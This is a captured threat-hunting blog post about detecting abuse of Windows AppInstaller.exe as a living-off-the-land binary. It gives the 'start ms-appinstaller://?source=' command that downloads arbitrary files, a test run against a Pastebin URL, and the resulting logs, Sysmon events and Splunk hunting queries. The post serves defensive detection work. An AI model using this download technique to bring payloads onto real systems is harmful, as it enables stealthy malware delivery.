detect.fyi
Open in
urlscan Pro
162.159.152.4
Public Scan
Submitted URL: https://www.bing.com/ck/a?!&&p=974473bc9f34c6a2JmltdHM9MTcwNDkzMTIwMCZpZ3VpZD0xZTRlNmQ2NS0xZTQyLTYzYmYtMGNkMi03ZTljMW...
Effective URL: https://detect.fyi/lolbas-detection-serie-1-appinstaller-exe-96971b9b1793?gi=515b3cbc3ee1
Submission: On January 12 via manual from US — Scanned from DE
Effective URL: https://detect.fyi/lolbas-detection-serie-1-appinstaller-exe-96971b9b1793?gi=515b3cbc3ee1
Submission: On January 12 via manual from US — Scanned from DE
Form analysis
0 forms found in the DOMText Content
Open in app Sign up Sign in Write Sign up Sign in Mastodon LOLBAS DETECTION SERIE [1] - APPINSTALLER.EXE mthcht · Follow Published in Detect FYI · 6 min read · Aug 21, 2023 9 Listen Share The LOLBAS serie: https://mthcht.medium.com/list/lolbas-843ba9de6810 WHAT IS APPINSTALLER? AppInstaller is an utility that allows the installation of APPX and MSIX packages, leveraged by numerous software editors and playing a key role in software management. WHAT IS LOLBAS ? Living Off The Land Binaries and Scripts The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. Living Off The Land techniques refer to a set of tactics used by attackers to exploit legitimate tools and processes already present on a system. By using these built-in tools and features, they can carry out malicious activities undetected by seamlessly blending in with legitimate traffic. For the LOLBAS project a LOLBin/Lib/Script must: * Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. * Have extra “unexpected” functionality. * Have functionality that would be useful to an APT or red team LOL TECHNIQUE FOR APPINSTALLER.EXE Ref LOLBAS:https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ notwhickey on twitter found a way to download arbitrary files with AppInstaller.exe by using the following command: start ms-appinstaller://?source=<url> Using ‘?source=<url>’, even if the targeted file is not recognized, it will still be downloaded to the system! Categorized: T1105: Ingress Tool Transfer TESTING AND DETECTION Important Note: I have tried with multiple versions of Windows, and it will not work on an updated system. This is because the ms-appinstaller protocol has been disabled by Microsoft since it was abused by malware, with Emotet being one of them: https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/ I tested it on this Windows 10 Build version and it worked for me: Let’s test the command suggested on the LOLBAS page: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw This is the message showed by Appinstaller after execution (Invalid file format): WHAT IS HAPPENING BEHIND THE SCENE ? with procmon running in the background, we can see these file creations: Both AppInstaller.exe and taskhostw.exe created text files named after our file in the Pastebin URL, ‘tdyShwLw[1].txt’, in the directory ‘C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\InetCache\<RANDOM-8-CHAR-DIRECTORY>’. This behavior is consistent with what’s suggested on the LOLBAS page. Additionally, an interesting file named ‘AILog.txt’ is created by AppInstaller.exe in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\ * Content of tdyShwLw[1].txt: We find the string calc.exe in our text file, which corresponds to the content of the Pastebin link we attempted to download (https://pastebin.com/raw/tdyShwLw). Thus, even if the system doesn’t recognize the targeted file as a valid format, it will still download it to the system ! * Content of AILog.txt (C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt): [Mon Aug 21 17:17:25 2023] Log File is located under: C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835277824] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835343360] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890000384] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890065920] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931222528] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931288064] [Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814751004164096] [Mon Aug 21 17:17:25 2023]{6064} App::OnActivated: Activated via other means (protocol/protocol for results/toast notification) [Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract. [Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A] [Mon Aug 21 17:17:25 2023]{6064} Setting launch intent to MSAPPINSTALLER_INSTALL [Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Toast Notification Background Task is already registered. [Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Toast Notification Background Task is already registered. [Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Installation Background Task is already registered. [Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Installation Background Task is already registered. [Mon Aug 21 17:17:25 2023]{6064} GoToState -> WindowButtonsPresentState [Mon Aug 21 17:17:25 2023]{6064} GoToState -> LoadingState [Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXExtensionSupported -> True [Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXBundleExtensionSupported -> True [Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A] [Mon Aug 21 17:17:25 2023]{6064} AppsInfo->CreateAsync, URI: [https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:25 2023]{6064} AppsInfo, File Type: [Package] [Mon Aug 21 17:17:25 2023]{6064} AppDataSource::CreateAsync [Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A] [Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating package info [Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f] [Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [Bundle] [Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync [Mon Aug 21 17:17:26 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw] [Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A] [Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating bundle info [Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f] [Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [AppInstaller] [Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync [Mon Aug 21 17:17:26 2023]{6064} AppInstaller XML content: calc.exe [Mon Aug 21 17:17:26 2023]{6064} AppInstallerExtension::LoadXmlFromSourceAsync -> Error: 0xc00ce556 [Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x80073aa0] [Mon Aug 21 17:17:26 2023]{6064} AppInstallerException -> Error Resource ID: [invalidFile] [Mon Aug 21 17:17:26 2023]{6064} GoToState -> LoadedState [Mon Aug 21 17:17:26 2023]{6064} GoToState -> DisplayAppsInfoErrorState This is a nice DFIR artefact that can be collected to detect the usage of this lolbin, the full url argument is indicated in this log https://pastebin.com/raw/tdyShwLw ! With Sysmon EventID 22 i can see Appinstaller.exe making a DNS request to pastebin.com: Log Name: Microsoft-Windows-Sysmon/Operational Source: Microsoft-Windows-Sysmon Date: 8/21/2023 5:17:25 PM Event ID: 22 Task Category: Dns query (rule: DnsQuery) Level: Information Keywords: User: Système Computer: DESKTOP-GI9JDDB Description: Dns query: RuleName: UtcTime: 2023-08-21 17:17:25.056 ProcessGuid: {ba956c93-8574-64e3-0000-00105a40cb00} ProcessId: 5276 QueryName: pastebin.com QueryStatus: 0 QueryResults: ::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170; Image: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe Event Xml: <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> <System> <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> <EventID>22</EventID> <Version>5</Version> <Level>4</Level> <Task>22</Task> <Opcode>0</Opcode> <Keywords>0x8000000000000000</Keywords> <TimeCreated SystemTime="2023-08-21T17:17:25.008082800Z" /> <EventRecordID>1478857</EventRecordID> <Correlation /> <Execution ProcessID="2684" ThreadID="3788" /> <Channel>Microsoft-Windows-Sysmon/Operational</Channel> <Computer>DESKTOP-GI9JDDB</Computer> <Security UserID="S-1-5-18" /> </System> <EventData> <Data Name="RuleName"> </Data> <Data Name="UtcTime">2023-08-21 17:17:25.056</Data> <Data Name="ProcessGuid">{ba956c93-8574-64e3-0000-00105a40cb00}</Data> <Data Name="ProcessId">5276</Data> <Data Name="QueryName">pastebin.com</Data> <Data Name="QueryStatus">0</Data> <Data Name="QueryResults">::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;</Data> <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe</Data> </EventData> </Event> what is unexpected is that i cannot see the command line in process execution logs (EventID 1,3,4688…): start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw I am not sure why it’s not logged, it seems to be a specific behavior for protocol handlers… But Since the ms-appinstaller protocol has been disabled by Microsoft 2 years ago, for the detection we can rely on the sigma detection proposed in the LOLBAS project: Appinstaller.exe making a DNS query and to get the full url requested we should see the url in our proxy logs (or by collecting the log file *:\Users\*\AppData\Local\Packages\Microsoft.DesktopAppInstaller_*\TempState\AILog.txt on the endpoints ! For this example using pastebin for data collection, i recommand these detections patterns for pastebin requests in your proxy logs (ref): Raw content access with pastebin in the field url: * http*//pastebin.com*/raw/* * http*//pastebin.com*/rw/* More details on pastebin detections: https://detect.fyi/how-threat-actors-use-pastebin-69a78c149ccf RELEVANT HUNTING SEARCHES: DNS Queries (to correlate with the logs from AILog.txt) `mysysmonlogs` process_path="C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_*\\AppInstaller.exe" signature_id=22 Now for the commandline (even if i did not see it) it could be in a script or combined with other commands and logged in process execution: (`scriptcontentblocklogs` OR (`mysysmonlogs` signature_id=1)) process_command="*start ms-appinstaller://?source=http*" OR scriptcontent="*start ms-appinstaller://?source=http*" Lookup Table entries: (change with your own field mapping) Moving on to the next LOLBAS ! SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD. FREE Distraction-free reading. No ads. Organize your knowledge with lists and highlights. Tell your story. Find your audience. Sign up for free MEMBERSHIP Access the best member-only stories. Support independent authors. Listen to audio narrations. Read offline. Join the Partner Program and earn for your writing. Try for $5/month Threat Hunting Detection Engineering Cybersecurity Lolbin Appinstaller 9 9 Follow WRITTEN BY MTHCHT 331 Followers ·Writer for Detect FYI Threat Hunting - DFIR - Detection Engineering https://twitter.com/mthcht Follow MORE FROM MTHCHT AND DETECT FYI mthcht in Detect FYI THREAT HUNTING - SUSPICIOUS USER AGENTS HUNTING FOR SUSPICIOUS USER AGENTS WITH SPLUNK 14 min read·Jan 1 76 mthcht in Detect FYI THREAT HUNTING — SUSPICIOUS WINDOWS SERVICE NAMES SIMULATION AND DETECTION 13 min read·3 days ago 38 Simone Kraus in Detect FYI RHYSIDA RANSOMWARE AND THE DETECTION OPPORTUNITIES ROBUST DETECTION AND ANALYTICAL SCORING COUNTERING CY-X THREAT ACTOR LIKE RYHSIDA 12 min read·Dec 10, 2023 75 1 mthcht in Detect FYI DETECTING DNS OVER HTTPS DETECTING DNS OVER HTTPS - DOH WITH A SIEM - LOGS ANALYSIS 8 min read·Nov 7, 2023 77 1 See all from mthcht See all from Detect FYI RECOMMENDED FROM MEDIUM mthcht in Detect FYI DETECTING PSEXEC AND SIMILAR TOOLS DETECT PSEXEC 5 min read·Aug 7, 2023 77 Simone Kraus in OSINT TEAM BIG GAME HUNTING — VIDAR SERVER INFRASTRUCTURE IN GERMANY SCATTERED SPIDER AND SVR? 5 min read·Dec 17, 2023 55 LISTS NATURAL LANGUAGE PROCESSING 1081 stories·556 saves MITRE Caldera MITRE CALDERA™ NAIVE BAYES PLANNER AUTHORS: KIRILL USUBYAN, MICHAEL KOUREMETIS & CHRIS JELLEN 6 min read·Oct 3, 2023 52 Ron Kaminsky GEOLOCATING PICTURES VIA OSINT & AI A DEEP DIVE INTO THE CAPABILITIES OF AI IN OSINT INVESTIGATIONS 6 min read·Jan 3 77 Nived Sawant INCIDENT RESPONSE ON LINUX — LOOKING INTO RIGHT PLACES. INTRODUCTION: 5 min read·Jan 4 13 Angelo Pio Amirante MALWARE DEVELOPMENT: HOW TO STORE A PAYLOAD IN DIFFERENT SECTIONS OF A PE FILE THIS ARTICLE WILL SHOW HOW TO STORE A MALICIOUS PAYLOAD IN DIFFERENT SECTIONS OF A PE FILE. THIS ARTICLE IS PART OF A SERIES, IF YOU… 3 min read·Jul 23, 2023 62 See more recommendations Help Status About Careers Blog Privacy Terms Text to speech Teams To make Medium work, we log user data. By using Medium, you agree to our Privacy Policy, including cookie policy.